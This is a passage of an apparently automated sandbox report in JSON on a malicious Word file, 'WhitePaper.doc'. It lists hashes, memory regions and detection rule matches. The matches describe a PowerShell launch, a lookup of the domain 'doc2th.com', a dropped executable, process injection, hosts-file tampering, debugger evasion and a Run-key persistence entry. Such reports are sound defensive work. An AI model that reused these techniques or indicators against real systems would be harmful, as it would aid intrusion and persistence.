"flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 14286848, "type": "region", "version": 1 }, "end_va": 14315519, "entry_point": 0, "filename": null, "id": "region_1849", "name": "pagefile_0x0000000000da0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14286848, "timestamp": "00:01:49.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 14352384, "type": "region", "version": 1 }, "end_va": 14360575, "entry_point": 0, "filename": null, "id": "region_1850", "name": "pagefile_0x0000000000db0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14352384, "timestamp": "00:01:49.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 40644607, "entry_point": 0, "filename": null, "id": "region_1851", "name": "pagefile_0x00000000022d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36503552, "timestamp": "00:01:49.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1863254016, "type": "region", "version": 1 }, "end_va": 1863577599, "entry_point": 1863254016, 
"filename": "\\Program Files\\Mozilla Firefox\\freebl3.dll", "id": "region_1852", "name": "freebl3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1863254016, "timestamp": "00:01:49.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1853", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:01:49.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1854", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:01:49.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1855", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": 
"memory_mapped_file", "start_va": 1962868736, "timestamp": "00:01:49.579", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The dump total size limit was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "WhitePaper.doc", "id": 20883, "md5_hash": "30926dda00ebf82f1355217d4285980f", "sample_type": "word_document", "sha1_hash": "d1b8a2414232fbeb997dcb4fdc1d9969137a5445", "sha256_hash": "1c0a1a7c695d5e1a7497b7fa4f75cf83f12265eaca2297b3d72461d110fcb079", "size": 8685, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 251200, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_22149.png", "size": 255440, "thumbnail_archive_path": "screenshots/thumbnail_22149.png", "timestamp": "00:00:22.149", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_30321.png", "size": 255055, "thumbnail_archive_path": "screenshots/thumbnail_30321.png", "timestamp": "00:00:30.321", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_32631.png", "size": 57675, "thumbnail_archive_path": "screenshots/thumbnail_32631.png", "timestamp": "00:00:32.631", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": 
"screenshots/screenshot_38147.png", "size": 57613, "thumbnail_archive_path": "screenshots/thumbnail_38147.png", "timestamp": "00:00:38.147", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_40151.png", "size": 56726, "thumbnail_archive_path": "screenshots/thumbnail_40151.png", "timestamp": "00:00:40.151", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_52355.png", "size": 61239, "thumbnail_archive_path": "screenshots/thumbnail_52355.png", "timestamp": "00:00:52.355", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_113897.png", "size": 56881, "thumbnail_archive_path": "screenshots/thumbnail_113897.png", "timestamp": "00:01:53.897", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_115156.png", "size": 57149, "thumbnail_archive_path": "screenshots/thumbnail_115156.png", "timestamp": "00:01:55.156", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_116164.png", "size": 47911, "thumbnail_archive_path": "screenshots/thumbnail_116164.png", "timestamp": "00:01:56.164", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-12-15 17:49", "analyzer_version": "2.2.0", "chrome_version": "58.0.3029.110", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.600", "microsoft_excel_version": "15.0.4569.1504", "microsoft_office_version": "15.0.4569.1504", "microsoft_power_point_version": "15.0.4569.1504", "microsoft_project_version": "15.0.4569.1504", "microsoft_publisher_version": "15.0.4569.1504", "microsoft_visio_version": "15.0.4569.1504", "microsoft_word_version": "15.0.4569.1504", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, 
"vm_architecture": "x86_32-bit_pae", "vm_kernel_version": "6.1.7601.17514_(684da42a-30cc-450f-81c5-35b4d18944b1)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_160", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Local\\!PrivacIE!SharedMemory!Mutex\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_335", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": 
"artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1446", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "192.232.251.15", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1483", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"doc2th.com\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1575", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"\".", "technique_path": 
"built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Nameless", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1598", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create nameless mutex.", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\ntdll.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\ntdll.dll", "operations": [ "access" ], "type": 
"file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_kernel_debugger", "operation_desc": "Try to detect kernel debugger", "ref_gfncalls": [ { "ref_id": "gfn_7167", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_kernel_debugger_by_api", "technique_desc": "Check via API \"NtQuerySystemInformation\".", "technique_path": "built_in._anti_analysis._detect_kernel_debugger.vmray_detect_kernel_debugger_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_debugger", "operation_desc": "Try to detect debugger", "ref_gfncalls": [ { "ref_id": "gfn_7168", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_debugger_by_api", "technique_desc": "Check via API 
\"NtQueryInformationProcess\".", "technique_path": "built_in._anti_analysis._detect_debugger.vmray_detect_debugger_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\cmmon32.exe", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\cmmon32.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"\\??\\C:\\Windows\\System32\\cmmon32.exe\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\cmmon32.exe", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\cmmon32.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"\\??\\C:\\Windows\\System32\\cmmon32.exe\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": 
"vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_illegitimate_api_usage", "operation_desc": "Illegitimate API usage", "ref_gfncalls": [ { "ref_id": "gfn_7194", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_illegitimate_api_usage_by_create_process_internal", "technique_desc": "Internal API \"CreateProcessInternalW\" was used to start \"C:\\Windows\\System32\\cmmon32.exe\".", "technique_path": "built_in._anti_analysis._illegitimate_api_usage.vmray_illegitimate_api_usage_by_create_process_internal", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_7194", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\cmmon32.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7196", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 
1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\windows\\explorer.exe\" reads from \"C:\\Windows\\System32\\cmmon32.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_delay_execution", "operation_desc": "Delay execution", "ref_gfncalls": [ { "ref_id": "gfn_7197", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_delay_execution_by_sleep", "technique_desc": "One thread sleeps more than 5 minutes.", "technique_path": "built_in._anti_analysis._delay_execution.vmray_delay_execution_by_sleep", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7198", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe\" reads from \"c:\\windows\\explorer.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "664908S9UTEIZ6MN", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", 
"category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_7214", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"664908S9UTEIZ6MN\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "OLO0NDS-0AXWwKzG", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_7215", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"OLO0NDS-0AXWwKzG\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_illegitimate_api_usage", "operation_desc": "Illegitimate API usage", "ref_gfncalls": [ { "ref_id": "gfn_7224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_illegitimate_api_usage_by_create_process_internal", "technique_desc": "Internal API \"CreateProcessInternalW\" was used to start \"C:\\Windows\\System32\\cmd.exe\".", "technique_path": 
"built_in._anti_analysis._illegitimate_api_usage.vmray_illegitimate_api_usage_by_create_process_internal", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_7224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\cmd.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "access" ], 
"type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_7289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_read_network_configuration", "operation_desc": "Read network configuration", "ref_gfncalls": [ { "ref_id": "gfn_7293", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_hosts_file", "technique_desc": "Read the current network configuration through the host.conf file.", "technique_path": "built_in._network._read_network_configuration.vmray_read_hosts_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7304",
"ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\windows\\system32\\cmmon32.exe\" reads from \"c:\\windows\\explorer.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_7348", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"C:\\Program Files\\Crfitq6x\\gdigzvh.exe\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_illegitimate_api_usage", "operation_desc": "Illegitimate API usage", "ref_gfncalls": [ { "ref_id": "gfn_7566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_illegitimate_api_usage_by_create_process_internal", "technique_desc": "Internal API 
\"CreateProcessInternalW\" was used to start \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\".", "technique_path": "built_in._anti_analysis._illegitimate_api_usage.vmray_illegitimate_api_usage_by_create_process_internal", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_7566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_7568", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\windows\\system32\\cmmon32.exe\" reads from \"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_tcp_sessions_down", "operation_desc": "TCP Server not available", 
"ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_sessions_down", "technique_desc": "Every TCP connection attempt failed.", "technique_path": "built_in._network._tcp_sessions_down.vmray_tcp_sessions_down", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_system", "operation_desc": "Write into memory of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory_system", "technique_desc": "\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe\" modifies memory of \"c:\\windows\\explorer.exe\"", "technique_path": 